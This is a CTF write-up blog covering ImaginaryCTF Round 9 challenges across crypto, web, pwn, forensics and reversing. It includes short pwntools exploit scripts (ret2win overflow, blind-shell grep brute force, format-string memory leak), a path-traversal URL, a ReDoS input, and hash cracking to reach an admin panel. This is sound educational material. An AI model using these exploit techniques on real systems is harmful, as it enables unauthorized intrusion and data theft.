Max49's ICTF Round 9 Challenge Writeups

Color Key (according to the creators, not to me): Green = Easy, Yellow = Easy/Medium, Orange = Medium, Red = Medium/Hard, Purple = Hard, Blue = Really hard


Sanity Check

Welcome to Round 9! Download the file to get the flag. You can submit flags with the .flag ictf{s0me_l33t_str1ng} command. DM your flags to me, ImaginaryCTF, NOT to the old CTF Challenge Bot. H​​​​‎​​​​‏‍​​​​​‏​​​​​​‌‏‌ave fun in Round 9!

Attachments
https://imaginary.ml/r/547B44EC

Category

Misc

Author

Board

Points

15

Solve:

So to solve this chall (which was a little harder since it was April Fool's Day), you first needed to download the file you're given and open it to see a youtube link. After getting RickRolled, you would see that the description contains a lot of whitespace. By either scrolling down a lot or "Ctrl + F"ing "ictf{", you would get the flag. The flag was later added to #faq like it always is.

Flag:  

ictf{w3lcome_to_r0und_9!}


Rotations

Caesar would be proud.

Attachments

:4E7L=bED0DEcCE0_FE06K0H`E90D_>60C_EcfPN

Category

Crypto

Author

Eth007

Points

30

Solve:

Solving this chall was pretty simple based on the information you're given. You're given a string with the hint of "Rotations" and "Caesar". From this information, you can tell that this is an ROT47 cipher because ROT13 doesn't affect special characters. By putting this string into CyberChef and putting the ROT47 cipher into the middle, we get the flag.

Flag:  

ictf{l3ts_st4rt_0ut_ez_w1th_s0me_r0t47!}


Salty

I like my hashes salty. Like, REALLY salty.

Attachments
https://imaginary.ml/r/FB146915

Category

Reversing

Author

Eth007

Points

70

Solve:

Just based on the hints given in the chall, we can assume that this challenge will probably have something to do with salted hashes. By opening the python script, we see that if this were to be run, we would just be put into an "emulator" of our own system. The checkinput() function is where all the important information is. From the first line of this function, we know that it's checking to see if the parameter is equal to a value, but we don't know what this value is by just looking at it. Since this is python, we can just open the python terminal and put the right side of this if statement into the terminal to get what we want.

This looks like a hash and we can easily tell what kind of hash it is based on the python script, and it's a SHA512 hash. The first thing I think of when seeing a hash is to put it into CrackStation. Putting this hash through returns "saltwater" and knowing that the hashed string was salt + inp, we know that inp is water. Moving on, we see another long encoded string similar to what we saw when we calculated the final hash. Putting this into python gives us a pastebin link. Going here prompts for a password and from the script, we know that the password is inp, which is "water". Putting "water" into this password box gives us the flag.

Flag:  

ictf{s4lty_w4ter_1nd33d_4f285a3}


ret2win

Here comes your monthly dose of one easy pwn. Can you reach the win() function?

Attachments
https://imaginary.ml/r/C2B3-ret2win

nc stephencurry.ctfchallenge.ga 5000

Category

pwn

Author

ainz

Points

75

Solve:

                
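from pwn import *

p = remote('stephencurry.ctfchallenge.ga',5000)

# First input: 12 bytes of padding, then the 64-bit value 0x1337c0d3
offset = b'A' * 12
payload = offset + p64(0x1337c0d3)

p.sendline(payload)

# Second input: 36 bytes of padding, then the 64-bit value 0x4011b6
payload = b'A' * 36 + p64(0x4011b6)
p.sendline(payload)

p.interactive()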
                
              
Flag:  

ictf{mak1ng_r@nd0m_flags_15_n0t_fun}


Camouflage

I can't see anything... maybe I need to get glasses. Please put "ictf" before the string you find.

Attachments
https://imaginary.ml/r/BCBE6E1A

Category

Forensics

Author

Artemis37

Points

50

Solve:

To solve this challenge, we download the image to see nothing. It just seems to be a black image with nothing in it. From what I know from past CTF competitions, CyberChef has a feature called "Randomize Colour Palette" which could help reveal hidden images and text in pictures. Putting this image into CyberChef and dragging in the "Randomize Colour Palette" block into the middle gives us an image with the flag written in it.

Flag:  

ictf{y0U_mu5T_h@v3_4MAz!n9_I_s16h7}


sources-adventure-hardened

The boss isn't happy that you all were able to retrieve his flag last time. Now, with the new features he's implemented, he's sure no one will ever get his flag now (NOTE: this challenge does not require the use of enumeration tools or injections)

Attachments
https://sources-adventure-hardened.max49.repl.co/

Category

Web

Author

Max49

Points

100

Intended Solve:

This was one of my challs! So the intended solve for this challenge was as follows:

So, on going to the link provided, you're presented a login screen with no info specifically stated. In the original sources-adventure in Round 8, the logins were stored in /logins.txt and that was figured out through inspecting the comments. When viewing the source of the page with Ctrl + U or equivalent, no comments are seen, but the source seems to go on for a while. By searching for the comment marker (<!--) with Ctrl+F or scrolling down, you'll see a conversation where it's mentioned that the file where the logins are stored can't be accessed by search engine crawlers anymore (alternatively, this conversation could've been found much easier in the developer tools). Anyone who has some experience in web ctf challs knows that this is referring to the robots.txt file and on going to this page, it's seen that the page /classified_info is disallowed. Going to this page gives us our login information (All of these do the exact same thing).

Now that we have access to the returning employee portal, we're greeted with javascript alert spam like last time. Attempting to deobfuscate this code as was the method of solving the last sources-adventure will be of no use. In the boss notification, it's stated that you will be replaced by rooYay2 with a link to his resume. Going here will show rooYay2's resume and the comments on this webpage say that his employee password will be his favorite emoji, which is rooNoBooli, as seen by hovering over his picture.

Logging into rooYay2:rooNoBooli brings up rooYay2's custom portal, with no real info that would point you anywhere specific. The comments just say that it's time for the sources adventure. A comment on rooYay2's resume also said to create a custom employee portal based around rooYay2's interests, and it did say that cookies were his favorite snack. Inspecting the cookies with developer tools shows two cookies: adminID and adminPass. The values of these two cookies look like hex, but decoding these as hex returns nothing of use. Since it's not hex, the next thought is that it's a hash, as that's what it looks like. Putting these strings into CrackStation cracks the hashes and gives us the login for the admin panel: "991560128" and "licypz".

Logging into the admin panel now gives us a new boss announcement stating that payroll information is located on the payroll page as usual. Going to /payroll gives us a download link to a json file with payroll information stored inside it. An employee ID is also stored with each employee and since the last employee's ID is "ictf", we can assume this is where the flag is, which is in the order from last user ID to first user ID. After putting all these IDs together, we get the flag.

Flag:  

ictf{d3v3l0p3r_t00ls_ar3_gr3at!_6c6f6c}


pyrev

I think it's time for a dis.dis() track...

Attachments
https://imaginary.ml/r/7F0C-out.txt

Category

rev

Author

Robin_Jadoul

Points

50

Solve:

For this chall, we're given a file that contains what we know to be python bytecode. Given the description, we can look up dis python to get the documentation that matches the text we see in the file. Using this documentation, we can rewrite this bytecode in python to get the script that will give us our flag. Rewriting the code using the documentation gives us the code:

for x in ((0, 6, -17, 14, -21, 25, -23, 5, 15, 2, -12, 11, -1, 6, -4, -12, -6, 9, 8, 5, -3, -3, 6, -6, 4, -18, -6, 26, -2, -18, 20, -17, -9, -4)):
  n -= x
  print(chr(n), end='')
print()
return None


Looking at this code, it's not clear what n is. Looking at what Robin later posted, we see that this is a parameter being passed in this function.

By rearranging our code a little bit to match this scenario, we still need a value to pass into the function that gives us the flag. The flag can be retrieved in one of two ways now. The first way is to ignore logic and just bruteforce numbers 1-300 until you get the flag. Alternatively, some logic can be applied and knowing that the first character has to be i (flag format is ictf{), you could find the number that when subtracted by 0 gives you 105, which is 105. Passing 105 into the function gives us our flag.
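Both routes described above, as an added example (not Robin_Jadoul's original source): the loop is wrapped in a function that takes n, and the function and constant names are assumptions made here.

```python
# Offsets transcribed from the rewritten bytecode above.
DELTAS = (0, 6, -17, 14, -21, 25, -23, 5, 15, 2, -12, 11, -1, 6, -4, -12, -6,
          9, 8, 5, -3, -3, 6, -6, 4, -18, -6, 26, -2, -18, 20, -17, -9, -4)

KNOWN_PREFIX = "ictf{"  # flag format stated in the write-up


def decode(n, deltas=DELTAS):
    """Replay the loop: subtract each offset from the running value n."""
    out = []
    for x in deltas:
        n -= x
        out.append(chr(n))  # raises ValueError if n leaves the code point range
    return "".join(out)


def recover_start(prefix=KNOWN_PREFIX, deltas=DELTAS):
    """Derive n from the first known character, then check the whole prefix.

    The first character only fixes n; the remaining prefix characters are a
    check that the offsets were transcribed from the bytecode correctly.
    """
    n = ord(prefix[0]) + deltas[0]
    if not decode(n, deltas).startswith(prefix):
        raise ValueError("offsets disagree with the known prefix")
    return n


def brute_force(candidates=range(1, 301), prefix=KNOWN_PREFIX):
    """The other route: try every start value and keep the ones that fit."""
    hits = []
    for n in candidates:
        try:
            text = decode(n)
        except ValueError:
            continue  # small n drives the running value below zero
        if text.startswith(prefix):
            hits.append(n)
    return hits


if __name__ == "__main__":
    start = recover_start()
    print(start, decode(start))
```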

Flag:  

ictf{bytecode_could_be_easy_as_py}


ImaginaryBot v2

@ImaginaryBot is ok, but @Imaginary Bot(v2) is even better (this is neither an OSINT chall nor an exploitation chall, everything you need to solve the chall can be gotten through commands :wink: )

Attachments

DM @Imaginary Bot (v2) (Do not use the bot in this server)

Category

Misc

Author

Max49

Points

75

Intended Solve:

This was another chall that I submitted this round. This one was a little more guessy than sources-adventure-hardened, but I thought it was pretty straightforward overall (and it's misc, of course it's gonna be guessy to some degree). So when you DM this bot with !help, you're given a list of all the commands the bot has. The first logical step after this is to do !info to learn a little more about what you're supposed to do and rsa is the only kind of info you're given. Doing !rsa gives you an rsa problem to solve where Public Key = (p)(q), e = e, and (c+6)/2 is the ciphertext plus 6 divided by 2. After multiplying the ciphertext by 2 and subtracting 6 to get the real ciphertext, this all can just go into RsaCtfTool to get the message, which is that this chall might be a steg (steganography) chall. Now that we've gotten !help, !info, and !rsa out of the way, we try the rest of the commands to see that !printflag returns the same output every time it's run and !checkflag literally only checks the flag, which you provide as input, so the only two commands left are !pfp and !imaginary.

!pfp functions as a normal pfp command (the original plan for this chall was to embed the flag in the bot's pfp but discord changes the image when you upload it) and poses the only part, I think, in this challenge where someone might get confused. !imaginary is the last command and returns a random output each time, with one of these being an image. With the hint of this being a steg chall, download this image and run some steg tools on it. The intended tool to use was stegseek as this file was hidden with steghide with a passphrase that's in rockyou. The flag was in the embedded txt file.

Flag:  

ictf{d1sc0rd_b0ts_ar3_s0_c00l_r1ght?}


ReDOS

I've made a Super Secure Server(tm) with no vulnerabilities whatsoever. Can you DOS my server to prove me wrong?

Note: do NOT DDOS the server.

Attachments

nc oreos.ctfchallenge.ga 1337, https://imaginary.ml/r/5FC3-redos.py

Category

Reversing/Misc

Author

puzzler7

Points

75

Solve:

So in this chall, we're given a nc server to connect to and some source code. Firstly, based off the title, by looking up "ReDOS", we see that this is a DOS attack where the regex takes too long to compute. By analyzing the source code a little bit, we see that we need to get the code to timeout in order to give us the flag. To get the code to return TimeoutError, we see that we need to get validateEmail(email) to timeout for 10 seconds, and this function just checks input against a regex. We also see that validateEmail(email) is only called in the createAcc() function and this function is only called when we access the "Create Account" input from the menu we're greeted with.

So basically, to sum it up, we need to make the email input time out when we create an account.

By entering the regex into regex101, we can analyze the regex to see what it's looking for. To simplify it, the regex is looking for:

(anything an unlimited number of times)@gmail(unlimited number of times).(com|org|edu|gg) (where | is or)


So examples of strings that match this regex include:

admin@gmail.com
aaaaaaaaaaaaaaaaaaaaaaaaaa@gmail.gg
grhpwopoh@gmailgmail.org
opwuerpoweurpwoe@gmailgmailgmail.edu


When entering test strings into regex101, we can see how long it takes for the regex to compute:



and since we know that this is a ReDOS attack and we need to timeout the regex, we should be looking at this number during our testing.

From here, there are two ways of finding an email that times out the regex. The first way (the way I originally solved it) was just spamming gmail a bunch of times until the time turned into "catastrophic backtracking".



An alternative (and much better) way of getting a string was seeing that after typing a certain amount of "gmail"s, typing any other character would also return "catastrophic backtracking"



Inputting any of these strings that return "catastrophic backtracking" when the program prompts the creation of an account will cause the program to timeout and will display the flag.
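The challenge's actual regex is not reproduced in this write-up, so the added example below uses an assumed pattern of the shape described above, next to a rewrite that accepts the same strings without nested repetition. All names and the 254-character cap are assumptions, and this is not the challenge's code.

```python
import re
import time

# Assumed pattern (not the challenge's regex): a repeated group nested inside
# another repeated group. When the tail fails to match, the engine retries
# every way of splitting the run of "gmail" between the two quantifiers.
VULNERABLE = re.compile(r"^(.+)@((gmail)+)+\.(com|org|edu|gg)$")

# Accepts the same strings, but the repetition is a single quantifier, so a
# failing match gives up after a linear number of steps.
HARDENED = re.compile(r"^.+@(?:gmail)+\.(?:com|org|edu|gg)$")

MAX_EMAIL_LEN = 254  # assumed policy limit, checked before any regex runs


def validate_email(email):
    """Hardened validator: bound the input first, then use the linear pattern."""
    if len(email) > MAX_EMAIL_LEN:
        return False
    return HARDENED.match(email) is not None


def probe(n):
    """Regression input: n repetitions of 'gmail', then a character that cannot match."""
    return "a@" + "gmail" * n + "!"


def seconds_to_match(pattern, text):
    """Wall-clock time for one match attempt."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start


if __name__ == "__main__":
    # Time for the nested pattern roughly doubles with each extra repetition;
    # the rewritten pattern stays flat.
    for n in (8, 12, 16, 20):
        text = probe(n)
        print(n,
              round(seconds_to_match(VULNERABLE, text), 4),
              round(seconds_to_match(HARDENED, text), 6))
```

Running a probe like this in a test suite, with a time budget on the validator, catches a backtracking-prone pattern before it reaches a server.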

Flag:  

ictf{3v3n_r3g3x_i5_in53cur3}


Optimal RSA

You're aware that textbook RSA is actually insecure, right? So anyway, I applied some padding. For even more security, I'm also using SHA512.

Attachments
https://imaginary.ml/r/96A4-output.txt

Category

Crypto

Author

Robin_Jadoul

Points

75

Solve:

My solve script:

                
                  

from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA512

# Minimal stand-in key object (it shadows the imported RSA name) holding
# n, e, d and a raw _decrypt(), passed to the OAEP cipher below
class RSA:
    n = [long number redacted]
    e = 65537
    d = [long number redacted]

    def _decrypt(self, ciphertext):
        return pow(ciphertext, self.d, self.n)

ciphertext = bytes.fromhex("[long string redacted]")
key = RSA()
# OAEP padding with SHA512, as the challenge description says
cipher = PKCS1_OAEP.new(key, hashAlgo=SHA512)
message = cipher.decrypt(ciphertext)
print(message)

Flag:  

ictf{single_primes_are_definitely_optimal}


Blind Shell

Normally once you have a shell, you win. Here, you already start with a shell - can you find your way to the flag?

Attachments

https://imaginary.ml/r/CABD-blind.py, nc oreos.ctfchallenge.ga 12345

Category

Misc/Pwn

Author

puzzler7

Points

125

Solve:

                
                  

from pwn import *
import string

p = remote('oreos.ctfchallenge.ga',12345)

chars = list(string.printable)
command = "grep -F "
flag = "ictf{"
chars.remove('\n')

# The shell only answers SUCCESS or not, so grow the known prefix one character at a time
while True:
    for char in chars:
        p.recvuntil(b'>>> ')
        p.sendline(command + "\'" + flag + char + "\' flag.txt" )
        if(p.recvline() == b'SUCCESS\n'):
            # grep found flag + char in flag.txt, so char is the next character
            flag += char
            if(char == "}"):
                print(flag)
            break
        else:
            continue
    if(flag[-1] == "}"):
        break

Flag:  

ictf{g01n8_1n_bl!nd?n0t_@_pr0bl3m!}


Look-For-It

Look for flag.txt

Note: This is a very easy 30 point challenge and does not require the use of enumeration tools.

Attachments

http://lookforit.epizy.com/

Category

Web

Author

ainz

Points

30

Solve:

This chall was a nice and easy one. We know the flag is in flag.txt and Eth007 gave the hint that it's very similar to "Pathological Liars", a challenge from the previous round. The solve for that chall was to go to the directory ../flag.txt, and doing something similar on this link gives us the flag. (The solve link is http://lookforit.epizy.com/?page=../flag.txt)

Flag:  

ictf{l00ked_f0rit&_found_w@ld0..._n0t_really}


Rotations of a different kind

We've had one rotation, yes, but what about another one?

Attachments

69c6d133b72d9bb172cab52be68e5a3767beb12b668ed7396fe885a396ed9bb97d

Category

crypto/misc

Author

Robin_Jadoul

Points

75

Solve:

So for this chall, we're just given a string from which we have to find the flag. The only hint we're given is that this challenge is solved with rotations. We can put this string into CyberChef and see what we can do. Since this string isn't the right length to be any kind of common hash, let's just hex decode it to see what we can do. Hex decoding this gives us something that doesn't look exactly right, but it does start with an i, so we can attempt to work with this for now.

With the hint of rotations, we can try ROT13 or ROT47, but neither of those will give us the flag.

Flag:  

ictf{incrementing_left_rotations}
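The flag's wording names the transformation: byte i of the hex-decoded string has been rotated left by i bits. The following added example (not part of the original write-up; function names are assumptions) checks that against the known ictf{ prefix and then undoes it.

```python
# Ciphertext exactly as given in the challenge attachment above.
CIPHERTEXT_HEX = "69c6d133b72d9bb172cab52be68e5a3767beb12b668ed7396fe885a396ed9bb97d"
KNOWN_PREFIX = b"ictf{"  # flag format


def rotl8(byte, k):
    """Rotate an 8-bit value left by k bits (k is taken modulo 8)."""
    k %= 8
    return ((byte << k) | (byte >> (8 - k))) & 0xFF


def rotr8(byte, k):
    """Rotate an 8-bit value right by k bits."""
    return rotl8(byte, -k)


def infer_left_rotations(cipher, prefix=KNOWN_PREFIX):
    """For each known plaintext byte, list every left rotation that explains
    the ciphertext byte. A byte whose two nibbles are equal (such as 'f',
    0x66) is unchanged by a 4-bit rotation, so it yields two candidates.
    """
    return [[k for k in range(8) if rotl8(p, k) == c]
            for p, c in zip(prefix, cipher)]


def encode(plain):
    """Rotate byte i left by i bits."""
    return bytes(rotl8(b, i) for i, b in enumerate(plain))


def decode(cipher):
    """Undo the encoding: rotate byte i right by i bits."""
    return bytes(rotr8(b, i) for i, b in enumerate(cipher))


if __name__ == "__main__":
    data = bytes.fromhex(CIPHERTEXT_HEX)
    # Candidates per position follow 0, 1, 2, 3, 4: the rotation grows with the index.
    print(infer_left_rotations(data))
    print(decode(data).decode("ascii"))
```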


Spacebar Smasher

I hid my flag super deep in this game. Press the spacebar to advance. You'll have to play for days. I challenge you to get the flag! Note this is NOT a reversing challenge

Attachments

https://spacebarsmasher.netlify.app/

Category

Misc/Web

Author

Astro

Points

150

Solve:

coming soon, I forgot to make a writeup for this one give me a little bit.

Flag:  

ictf{y0ur_r34l_l1f3_sp4ceb4r_mu$t_b3_br0ken..._w@1t_wdym_y0u_d1dnt_cl1ck_214748366_times?!}


lookup-rev

This program is too slow, what do I do?

Attachments

https://imaginary.ml/r/E0FA-wpre.py

Category

Reversing

Author

ainz

Points

75

Solve:

This was a cool python reversing challenge. So when running this program as it was originally made, the only output printed is "ictf" until the program hangs. In analyzing what's taking place when this program is run, it can be seen that the part that makes the program hang is the part that checks if the number is prime. If we edit the program to print the numbers being tested before they enter the function, we see that the program hangs because the numbers get too large. We know that pycryptodome, more specifically Crypto.Util.number, has a function that checks if a number is prime and provides a True/False output like the current code does, so if we replace

 return all(n % i for i in islice(count(2), int(sqrt(n)-1)))

with

 return isPrime(n)

and run the program now, we see that we immediately get many more characters in the flag, but after a certain point, the program hangs again. In this case though, we know the program is working because it's slowly printing the output (this will get much slower over time)

Now we can see "ictf{l00kup_w00dal" after waiting about five minutes. Knowing that we're working with prime numbers, we look up "woodall primes" and are given a Wikipedia article about them. From the beginning of the article, we see that a Woodall number is calculated by the equation W = (n • 2**n) - 1, which is exactly what's happening in the sequence() function. Now that we know that a character will only print when n returns a Woodall prime, we can go to this website to see some values of n that would give us a Woodall prime number. Adding the list:

 woodall_nums = [2, 3, 6, 30, 75, 81, 115, 123, 249, 362, 384, 462, 512, 751, 822, 5312, 7755, ...]

at the beginning of the code and changing the end of the code to:

 i = woodall_nums[0]
 for i in range(len(woodall_nums)):
   i = woodall_nums[i]
   print(chr(key[0]^i%100))
   key.pop(0)
   i += 1

and then running the program again will print out our flag instantly.
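An added example (not the challenge's code; names are assumptions) of why the original check hangs and a fast primality test does not: it counts the divisors trial division would walk for a Woodall number and finds the prime indices with Miller-Rabin, used here in place of pycryptodome's isPrime so the block has no dependencies.

```python
import math

# Fixed witness bases; for numbers this large the result is "probable prime".
_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def woodall(n):
    """Woodall number W = n * 2**n - 1, as in the write-up."""
    return n * 2 ** n - 1


def trial_division_candidates(n):
    """How many divisors the original all(n % i ...) check walks when the
    Woodall number for index n is prime: every integer from 2 up to sqrt(W)."""
    return math.isqrt(woodall(n)) - 1


def is_probable_prime(m):
    """Miller-Rabin with fixed bases: a handful of modular exponentiations
    instead of sqrt(m) divisions."""
    if m < 2:
        return False
    for p in _BASES:
        if m % p == 0:
            return m == p
    d, s = m - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in _BASES:
        x = pow(a, d, m)
        if x in (1, m - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, m)
            if x == m - 1:
                break
        else:
            return False  # a is a witness that m is composite
    return True


def woodall_prime_indices(limit):
    """Indices n <= limit whose Woodall number is (probably) prime."""
    return [n for n in range(1, limit + 1) if is_probable_prime(woodall(n))]


if __name__ == "__main__":
    # Index 30 needs about 1.8e5 divisions, index 75 about 1.7e12: the hang.
    print(trial_division_candidates(30), trial_division_candidates(75))
    print(woodall_prime_indices(830))
```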

Flag:  

ictf{l00kup_w00dall_pr1me5_78e7f}


The GOAT

Buffer overflows are overrated. Try to pwn the GOAT's server instead. Connect with nc stephencurry.ctfchallenge.ga 5001.

Attachments

https://imaginary.ml/r/E7BF-goat

Category

Pwn

Author

Eth007

Points

150

Solve:

Unsolved  

Flag:  

not found


What's a database

What's a database? Why don't you store actual information? Why do I need to guess?

Attachments

https://whats-a-database.robinjadoul.repl.co/

Category

web

Author

Robin_Jadoul

Points

125

Solve:

Unsolved  

Flag:  

not found


Overlooked

A friend of mine sent me this picture of ICTF. Told me there was a package for me, but what could they mean?! It's almost as if the text file is my key.

Attachments

https://imaginary.ml/r/F04A-anew.rar

Category

Forensics

Author

Zyphen

Points

125

Solve:

This was a fun forensics chall to work on. So after unzipping the .rar file from the link, we get an image and a text file. With the description, it can be inferred that we need a passphrase for the image and that the passphrase has something to do with the text file.

Based on past ctf challs, it's known that files can be embedded in images with steghide. Running stegseek (a tool that runs through all rockyou phrases on the image) does not work, so we'll have to find the passphrase elsewhere. The description mentions that "It's almost as if the text file is my key." which brings us back to the text file.

When running the command "steghide extract -sf ictf.jpg" (I renamed the image) and entering the entire text file as a passphrase, no data is able to be extracted, so possibly the passphrase is hidden in the text file instead. When I pasted the text file into my terminal, I noticed characters like "\u200b", "\u200c", and "\u200d" showing up throughout the text even though I couldn't see them in the plain text file. By looking up these unicode characters, it's seen that these are called Zero Width characters (whitespace) and are usually invisible.

A popular tool for encoding and decoding whitespace steganography is offdev.net, but putting the text into this gives us nothing. If we search for an alternative tool, this one looks promising. If we copy and paste the text file into the Steganography Text box and press decode, we get something that doesn't look exactly right.


If we scroll down to the bottom of the page, we see that not all the characters we saw earlier are checked. Checking all of the boxes and running the decode again gives us a much better looking passphrase, "thisisthepasswordforthefilebutinzwspglhf".

Running "steghide extract -sf ictf.jpg" again and entering this new passphrase extracts a file named "quack.zlib", a compressed data archive. Looking up how to extract data from a zlib file brings us to the command "zlib-flate -uncompress < IN_FILE > OUT_FILE" and running this on the zlib file gives us an image with the flag written in it.

Flag:  

ICTF{s0m371m3s_zl1b_1s_1mp0r74n7_;(}


Little

The most annoying thing when teaching beginners pwn...

Attachments

ftcidne{nna1_sse1_s1ropmtnatfa5_2384...}

Category

Misc

Author

Eth007

Points

30

Solve:

With the hint given in the title, "Little", we can figure out that this is referring to the endianness (which is described as little or big) of the string. Putting this string into CyberChef and swapping the endianness (with raw data format) gives us our flag.

Alternatively, you could've noticed the pattern that if you read every 4 characters backwards, you would also get the flag.

Flag:  

ictf{end1anness_1s_1mportant_5af4832}


vnpack

I tried to make my flag printer smaller, but I think something got corrupted. Now it's not only my physical printer that's possessed anymore.

Attachments

https://imaginary.ml/r/274F-vnpack

Category

Reversing

Author

Robin_Jadoul

Points

75

Solve:

Unsolved  

Flag:  

not found


Bland RSA

My RSA's been tasting a bit bland, lately.

Attachments

https://imaginary.ml/r/CD88-out.txt

Category

Crypto

Author

Robin_Jadoul

Points

75

Solve:

Unsolved  

Flag:  

not found


Form a String

Every time I input a string, it seems to respond back with the same message. Perhaps there is something we can do to get the flag out of there.

Attachments

nc 34.203.197.39 3000 https://imaginary.ml/r/BC4B-Form_a_String.rar

Category

PWN

Author

Zyphen

Points

50

Solve:

The exploit in this challenge is that fprintf() leaks the contents of memory (a format string bug), which can get you the flag.

To solve this challenge, I first ran this script:

              
from pwn import *

p = remote('34.203.197.39',3000)

# Send %0$p through %100$p, one per prompt; the replies are read from the DEBUG log
for i in range(101):
    p.recv()
    p.sendline("%" + str(i) + "$p")
              
            

to see if I could spot any significant points in the memory. After running this with LogLevel on DEBUG, I saw a group of strings that looked like they could mean something:



Decoding this first hex in CyberChef gives us "r0f{ftci", which looks like a distorted version of the flag format. Swapping the endianness with the default word length gives us "{f0rictf", which is closer, but changing the word length to 8 gives us "ictf{f0r", which looks much better. Copy and pasting the next 4 strings into this CyberChef recipe and combining all of these fragments in order gives us the flag.

Flag:  

ictf{f0rm4t_s7r1ngs_4r3_w17h_printf}
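The decoding here and the one in "Little" are the same word-wise byte swap, shown below as an added example (not part of the original write-up). The first flag-bearing value is the one quoted above; the other leaked values are constructed from the flag, a 64-bit little-endian target is assumed, and the function names are hypothetical.

```python
import re

# "Little" attachment, exactly as given on this page.
LITTLE = "ftcidne{nna1_sse1_s1ropmtnatfa5_2384...}"

# Constructed %p replies: three non-flag values, then the five flag words.
# 0x7230667b66746369 is the value that hex-decodes to "r0f{ftci".
LEAKED = ["0x7ffc1d2e3a40", "(nil)", "0x1",
          "0x7230667b66746369", "0x317237735f74346d", "0x5f3372345f73676e",
          "0x6972705f68373177", "0x7d66746e"]


def swap_words(data, width):
    """Reverse the byte order inside each width-byte word, which is what
    CyberChef's "Swap endianness" does for the chosen word length."""
    if len(data) % width:
        raise ValueError("input length is not a multiple of the word width")
    return b"".join(data[i:i + width][::-1] for i in range(0, len(data), width))


def words_from_pointers(tokens, width=8):
    """Turn printf("%p") output back into the bytes as they sit in memory.

    %p prints each word as a number, most significant digit first, so on a
    little-endian target the text inside each word appears reversed.
    """
    out = bytearray()
    for tok in tokens:
        value = 0 if tok == "(nil)" else int(tok, 16)  # glibc prints NULL as (nil)
        out += value.to_bytes(width, "little")
    return bytes(out)


def extract_flag(raw):
    """Pull the first ictf{...} string out of a byte buffer, if there is one."""
    match = re.search(rb"ictf\{[^}]*\}", raw)
    return match.group().decode("ascii") if match else None


def decode_little(text=LITTLE):
    """'Little': 4-byte words, with the '.' padding falling after the brace."""
    return extract_flag(swap_words(text.encode("ascii"), 4))


def decode_leak(tokens=LEAKED):
    """'Form a String': 8-byte words taken straight from the %p replies."""
    return extract_flag(words_from_pointers(tokens))


if __name__ == "__main__":
    first = bytes.fromhex("7230667b66746369")
    print(first, swap_words(first, 4), swap_words(first, 8))
    print(decode_little())
    print(decode_leak())
```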


Minijail

Alright, this time I'll give you access to print. But I'll be imposing some other arbitrary restrictions...

Attachments

https://imaginary.ml/r/235D-minijail.py,nc oreos.ctfchallenge.ga 5000

Category

misc/pyjail

Author

Robin_Jadoul

Points

125

Solve:

Unsolved  

Flag:  

not found


canaries

Try pwning this one. You should first test your exploit locally with the file provided and make a fake flag.txt in the same directory as canaries. After testing locally, you can send the payload to the actual server. Pwntools is very handy for tasks like these.

Huge thanks to AlphaTank#3351 for devising and formulating this challenge.

Attachments

https://imaginary.ml/r/DD81-canaries,nc stephencurry.ctfchallenge.ga 5002

Category

Pwn

Author

AlphaTank

Points

150

Solve:

Unsolved  

Flag:  

not found


To be, or not to be

Suffer the slings and arrows of outrageous figlet.

Attachments

nc tirefire.org 11051

Category

programming

Author

tirefire

Points

100

Solve:

Unsolved  

Flag:  

not found


Just in Time 1

Yet another guessy challenge... Can you guess all the random numbers in time?

Attachments

https://imaginary.ml/r/2FF7-lookatthetime.py,nc oreos.ctfchallenge.ga 7331

Category

Misc

Author

puzzler7

Points

125

Solve:

Unsolved  

Flag:  

not found


Fake crypto

I promise you it's not a crypto challenge.

Attachments

https://fake-crypto.robinjadoul.repl.co/

Category

web

Author

Robin_Jadoul

Points

150

Solve:

Unsolved  

Flag:  

not found


When is it?

Hello there! I seem to have gotten myself lost in time. As you see, I am a time traveler but I forgot my password... You can do this right? Perhaps a little prize at the end to taunt you?

Attachments

https://imaginary.ml/r/CE62-pwn2

Category

Reversing

Author

Zyphen

Points

100

Solve:

Unsolved  

Flag:  

not found


JSON, but not notation

Given the amount of rickrolling, I'm fairly sure this site is broken in some way. So that means it should be easy to become an admin, right?

Attachments

https://json-but-not-notation.robinjadoul.repl.co/, https://imaginary.ml/r/0D18-jbnn.zip

Category

web

Author

Robin_Jadoul

Points

175

Solve:

Unsolved  

Flag:  

not found


Librarian

Welcome to the ImaginaryCTF Library! Can you get the flag? Connect at nc stephencurry.ctfchallenge.ga 5003.

Attachments

https://imaginary.ml/r/1023-librarian

Category

Pwn

Author

Eth007

Points

175

Solve:

Unsolved  

Flag:  

not found


Ropsten

It can do computations, not just money, did you know that?

Attachments

0xb623E940215925Ede9745DCd07950E912895fAcB

Category

blockchain

Author

Robin_Jadoul

Points

90

Solve:

This was a nice easy challenge to end the round off. So the only attachment you're given is a string and the hint of "ropsten". Looking up "ropsten" and clicking the second link down (first link is useless) brings us to this page which looks promising. Entering the string we're given into the search box brings up a page with some transactions, meaning we might be in the right place. Looking at "more info", we see a creator tag with another address. After looking more on this original page, we see that we can't find anything, so if we go to the creator's address page, we see a lot more we can work with.

Exploring this page, we see a few recent transactions. Clicking on the most recent one brings us to a page with some more info about the transaction. Scrolling down and clicking "Click to see more" gives us an "Input Data" box. Changing "View Input As" to UTF-8, shows the string "Invalid Solution". If we do the same thing on the second most recent transaction and go to the "View Input As" box, we see the flag.

Flag:  

ictf{blokchain_contract_compute}


Overall, I thought this round was much more approachable than last round and even though I didn't solve all the challs, I still enjoyed the challs that I did try to solve.

As always, board was super helpful this round and I want to thank all the challenge contributors for submitting challs and making this CTF great.

Here are links to more CTF writeups for round 9:

Astro (most challs + intended solves)

Ch0wW (most challs)

puzzler7 (intended solves from creator)

Robin_Jadoul (intended solves from creator)

the sun (most challs)

Board (all intended solves)